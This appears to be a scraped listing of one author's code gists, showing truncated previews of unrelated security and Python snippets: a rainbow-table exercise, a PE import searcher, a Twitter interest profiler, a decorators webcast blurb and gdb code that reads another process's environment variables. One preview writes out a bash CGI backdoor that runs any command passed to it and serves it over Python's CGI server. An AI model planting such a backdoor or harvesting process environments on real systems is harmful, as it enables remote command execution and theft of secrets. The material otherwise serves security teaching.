| #!/usr/bin/env python3 | |
| import argparse | |
| import math | |
| import random | |
| import hashlib | |
| import codecs | |
| """ | |
| Given the following MD5 Rainbow table that was generate using this program, determine | |
| the password for this hash bcccb2598de87da2952522eae448b356. You must use this program |
| import pefile | |
| import sys | |
| import ctypes | |
| import glob | |
| import argparse | |
| import itertools | |
| def search_tables(thefile, pename, search = []): | |
| if hasattr(thefile, "DIRECTORY_ENTRY_IMPORT"): | |
| if args.verbose or args.dump: |
| #!/usr/bin/env python | |
| """Twit Interest will infer a persons interests based upon the most common words in the descriptions of those they follow""" | |
| from twython import Twython | |
| from collections import Counter | |
| import sys | |
| #Twython isn't a standard module. "python -m pip install twython" to install it. If no pip run this https://bootstrap.pypa.io/get-pip.py | |
| twit = Twython(<your twitter APP KEY HERE> , < Your twitter Secret key here >) | |
| #Need a key? Go https://apps.twitter.com/app/new Create app. Put anything you want for the values in the app. |
| cd /tmp | |
| mkdir cgi-bin | |
| echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi | |
| echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi | |
| echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi | |
| chmod +x ./cgi-bin/backdoor.cgi | |
| python -m http.server --cgi | |
This is the material for SANS Webcast where we deep dive into the internals of how Python Decorators work. To understand this material you will want to watch the associated presentation.
The registration link is here: https://www.sans.org/webcasts/python-decorators-demystified-108900
(update) The talk has been archived here : https://www.youtube.com/watch?v=M4FrdJKGwX4&t=1981s
| #Liam Neeson is the single most protection that any organization can take to protect their Linux passwords hashes. | |
| #Once Liam Neeson is protecting your shadow file all your hashes are invisible to terrorist tools like cat, less and others that process bash escape sequences | |
| #Are you seriously thinking about using this in production? Back up your files and test it first. | |
| #Author @MarkBaggett | |
| import re | |
| import argparse | |
| import os | |
| import sys |
| def get_local_envvars_pid(process_id): | |
| gdb_script = "set variable $envs = (char **) environ\nset $i = 0\nwhile ($envs[$i] != 0)\nprint $envs[$i++]\nend\nquit\n" | |
| pathlib.Path("/tmp/getenv.gdb").write_text(gdb_script) | |
| gdb_command = f"gdb -batch -x /tmp/getenv.gdb -p {process_id}" | |
| ph = subprocess.Popen(gdb_command.split(),stdout=subprocess.PIPE, stderr=subprocess.PIPE) | |
| out,err = ph.communicate() | |
| log.debug(f"gdb environment variable output {out} errors {err}") | |
| try: | |
| found_items = re.findall(r'\$\d+\s+=\s+[0-9a-fx]+\s+"(\S+)=(.+)"\n', out.decode()) | |
| except: |
| import sys | |
| import os | |
| import pprint | |
| import pathlib | |
| import subprocess | |
| import logging | |
| import re | |
| def get_local_envvars_pid(process_id): | |
| gdb_script = "set variable $envs = (char **) environ\nset $i = 0\nwhile ($envs[$i] != 0)\nprint $envs[$i++]\nend\nquit\n" |
| import sys | |
| import subprocess | |
| import webbrowser | |
| import time | |
| import urllib.request | |
| import tempfile | |
| import zipfile | |
| import pathlib | |
| from io import BytesIO |